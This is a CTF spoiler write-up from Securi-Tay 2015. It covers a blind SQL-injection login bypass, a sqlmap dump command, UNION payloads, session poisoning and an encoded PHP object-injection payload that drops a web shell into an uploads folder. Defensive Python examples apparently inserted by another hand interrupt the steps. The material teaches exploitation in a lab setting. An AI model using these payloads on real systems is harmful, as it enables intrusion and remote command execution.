Securi-Tay 2015

Pentest were pleased to sponsor Securi-Tay IV at Abertay University on 27th February 2015. Thanks to everyone who took part in the challenge at Securi-Tay IV. We hope you enjoyed it. Nobody quite succeeded in breaking the challenge at the event, but one team was very close, so congratulations to them.

If you want to have a go at the challenge, it can be found online at along with a few hints. The challenge was designed to be difficult, so best of luck to anyone attempting it. If you are going to attempt the challenge, stop reading now! There are spoilers below.

1. Blind injection, Dump Database

The app consists of a username/password login. First we establish that the login is vulnerable to SQL injection. Once the injection has been confirmed, the objective is to extract the database. We use the following sqlmap command:

sqlmap --data "username=admin&password=sdd'and(0)like(0)escape(case(1)when (1=1*)then(1)else(12)end)-- -" -p "username" -u "http://" -D securi-tay-2015-cms -T auth --dump

We extract the authorisation table and the users table:

Database: securi-tay-2015-cms
Table: auth
[2 entries]

ID  PHPSESSID                   Username  Settings                          Password
1   b6f51b9i1v1n9jsk76g8mi9n62  admin     dXNlcmF1dGhfbG9naW58czoxOiIxIjs=  d41d8cd98f00b204e9800998ecf8427e
2   b6f51b9i1v1n9jsk76g8mi9n62  root      dXNlcmF1dGhfbG9naW58czoxOiIxIjs=  d41d8cd98f00b204e9800998ecf8427e

Database: securi-tay-2015
Table: users
[1 entry]

SID                         Pass                              Salt   Login
10t39dbpgiglr3tr955cr9dlg5  9fad885f781ff531fd43550cbd2318e6  blank  admin
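The root cause of steps 1 and 2 is that the login splices the submitted username and password straight into the SQL statement and then trusts whatever row comes back. The following is an added example (not the challenge's code or Pentest's) that models that login against a constructed in-memory SQLite copy of the five-column auth table shown above, and places the hardened version beside it. The sample row values and the "correct horse" password are constructed; the only page values used are the column layout and the Settings string.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample row modelled on the dumped "auth" table (same five columns;
# the session id and password are made up for this example, not the challenge's data).
SAMPLE_ROWS = [
    (1, "constructed-session-id", "admin", "dXNlcmF1dGhfbG9naW58czoxOiIxIjs=",
     hashlib.md5(b"correct horse").hexdigest()),
]

AUTH_COLUMNS = "id, phpsessid, username, settings, password"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with an auth table shaped like the dumped one."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE auth (id INTEGER, phpsessid TEXT, username TEXT, "
               "settings TEXT, password TEXT)")
    db.executemany("INSERT INTO auth VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    """Login the way the write-up implies the challenge app behaves: the submitted
    values are spliced into the SQL text, and whatever row the statement returns
    (including one an attacker appended with UNION SELECT) is trusted as the
    authenticated user's record."""
    digest = hashlib.md5(password.encode("utf-8")).hexdigest()
    sql = (f"SELECT {AUTH_COLUMNS} FROM auth "
           f"WHERE username = '{username}' AND password = '{digest}'")
    return db.execute(sql).fetchone()


def login_safe(db: sqlite3.Connection, username: str, password: str):
    """Hardened login: a parameterised query looks the row up by username only,
    then the password is verified in code with a constant-time compare. Input
    can no longer alter the statement, so no UNION row can come back and a wrong
    password never yields a record. (MD5 is kept only to mirror the dumped table;
    a real application should store salted bcrypt/argon2 hashes.)"""
    row = db.execute(f"SELECT {AUTH_COLUMNS} FROM auth WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return None
    digest = hashlib.md5(password.encode("utf-8")).hexdigest()
    if not hmac.compare_digest(row[4], digest):
        return None
    return row


if __name__ == "__main__":
    db = make_db()
    # The UNION payload from step 2 of the write-up, sent as the username field.
    union_payload = "1' union select 1,2,3,4,'dXNlcmF1dGhfbG9naW58czoxOiIxIjs='-- -"
    print("vulnerable:", login_vulnerable(db, union_payload, "1"))   # attacker-chosen row
    print("safe:      ", login_safe(db, union_payload, "1"))         # None
    print("safe:      ", login_safe(db, "admin", "correct horse"))   # the genuine row
```

Run it and the vulnerable function hands back the attacker-supplied row whose Settings column is the Base64 login flag, which is exactly what the step 2 payload relies on; the parameterised version returns nothing for the payload and only returns the genuine row for the genuine password.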

2. POST Request

Using the extracted data, the next step is to construct an injected query that returns a row the authentication SQL query will accept as valid.

POST username=1' union select 1,2,3,4,'dXNlcmF1dGhfbG9naW58czoxOiIxIjs='-- -&password=1

Notice that the cookie PHPSESSID value has changed to "4" in your browser.

Base64 decoding the Settings value dXNlcmF1dGhfbG9naW58czoxOiIxIjs= gives:

userauth_login|s:1:"1";

This is PHP's session-file serialisation format (name|serialised value): a single string login flag.
3. Download the CMS

4. Access the login screen

Access and set the session id in your browser to the extracted "eaoiqaujfo3c16tqvjarukbrr7"

Next you need to construct a session value which the CMS will recognise as valid. You can build one using your own IP address. For example, with the IP address 90.244.157.212 (the address encoded in the payload below) the serialised string is:

userauth_login|s:20:"admin-90.244.157.212";

which, Base64 encoded, is the value used in the payload below.
Construct and send the POST request to the CMS and exploit the shared hosting session poisoning issue:

POST username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoyMDoiYWRtaW4tOTAuMjQ0LjE1Ny4yMTIiOw=='--

Replace '4' with the session id extracted from the current id being presented at

POST username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','dXNlcmF1dGhfbG9naW58czoxOiIxIjs='--

5. File upload

This was a bonus challenge created for those who managed to complete the main challenge.

username=1' union select 1,2,3,'10t39dbpgiglr3tr955cr9dlg5','<session><id>any</id><value>TzoxODoiVXNlckF1dGhlbnRpY2F0aW9uIjoxOntzOjY6ImNvbmZpZyI7YTozOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjQ6Imhhc2giO3M6NDoiZXhlYyI7czo4OiJwYXNzd29yZCI7czo4NToiZWNobyBQRDl3YUhBZ2MzbHpkR1Z0S0NSZlIwVlVXeUpqYldRaVhTa2dQejQ9IHwgYmFzZTY0IC0tZGVjb2RlID4+IC4vdXBsb2Fkcy90bXA4LnBocCI7fX0=</value></session>' -- -&password=1
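Steps 2, 4 and 5 all turn on the same weakness: the CMS takes a session record that the attacker can write (via the injected SELECT) and unserialises it. Step 5 in particular works because the value is fed to a PHP unserialize() that will happily rebuild an object. The following is an added example (not the challenge's code or Pentest's) of a parser for the name|s:N:"..." session-record format seen in step 2 that accepts only plain string values and refuses arrays, objects and malformed lengths, together with a model of the admin-<ip> binding that step 4 describes. The IP addresses are constructed TEST-NET values, the exact form of the CMS's own IP check is an assumption drawn from the write-up, and the OBJECT_RECORD is a harmless constructed stdClass, not the step 5 payload.

```python
import base64
import re

# PHP's default session handler stores each variable as  name|<serialised value>.
# This parser accepts only the serialised *string* form s:<len>:"<bytes>"; arrays (a:),
# objects (O:) and anything else are refused rather than being unserialised.
_PHP_STRING = re.compile(r'^s:(\d+):"(.*)";$', re.DOTALL)


def decode_session_record(record_b64: str) -> tuple:
    """Decode one Base64-encoded session record and return (name, string value).
    Raises ValueError for anything that is not a well-formed single-string record."""
    raw = base64.b64decode(record_b64, validate=True).decode("utf-8")
    name, sep, serialised = raw.partition("|")
    if not sep or not name:
        raise ValueError("not a name|value session record")
    match = _PHP_STRING.match(serialised)
    if match is None:
        raise ValueError("refusing non-string serialised type %r" % serialised[:2])
    declared, value = int(match.group(1)), match.group(2)
    if len(value.encode("utf-8")) != declared:
        raise ValueError("declared length does not match the string content")
    return name, value


def encode_session_record(name: str, value: str) -> str:
    """Inverse of decode_session_record for a plain string value."""
    length = len(value.encode("utf-8"))
    payload = '%s|s:%d:"%s";' % (name, length, value)
    return base64.b64encode(payload.encode("utf-8")).decode("ascii")


def session_grants_login(record_b64: str, client_ip: str) -> bool:
    """Model (an assumption based on step 4) of a login check that honours the
    record only when it is 'userauth_login' with value 'admin-<ip>' for the
    requesting client. A bare "1" (the value in the dumped Settings column), a
    record bound to a different address, or a non-string serialisation is refused."""
    try:
        name, value = decode_session_record(record_b64)
    except ValueError:
        return False
    if name != "userauth_login":
        return False
    user, sep, ip = value.partition("-")
    return sep == "-" and user == "admin" and ip == client_ip


# Records used for demonstration. FLAG_ONLY is the Settings value from the dumped
# table; the other two are constructed here and are not the challenge's values.
FLAG_ONLY = "dXNlcmF1dGhfbG9naW58czoxOiIxIjs="
BOUND_RECORD = encode_session_record("userauth_login", "admin-192.0.2.10")
OBJECT_RECORD = base64.b64encode(b'userauth_login|O:8:"stdClass":0:{}').decode("ascii")

if __name__ == "__main__":
    print(decode_session_record(FLAG_ONLY))                     # ('userauth_login', '1')
    print(session_grants_login(FLAG_ONLY, "192.0.2.10"))        # False: flag not bound
    print(session_grants_login(BOUND_RECORD, "192.0.2.10"))     # True
    print(session_grants_login(BOUND_RECORD, "198.51.100.7"))   # False: other client
    print(session_grants_login(OBJECT_RECORD, "192.0.2.10"))    # False: object refused
```

The design point is that the type restriction happens before any deserialisation: a record whose value starts with O: never reaches an unserializer, so the object-injection route used in step 5 is closed regardless of what classes the application has loaded. The IP binding on its own would not have helped, because the injected SELECT lets the attacker write a record for whichever address they are connecting from.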

The winners

The prize was a set of Beats® wireless speakers, plus a bonus prize for anyone who succeeded in uploading a file to the app.

The winning team consisted of:

  • Scott Glossop
  • Matt Robey

Congratulations to both.

© Copyright Pentest Limited 2001 - 2017 All Rights Reserved.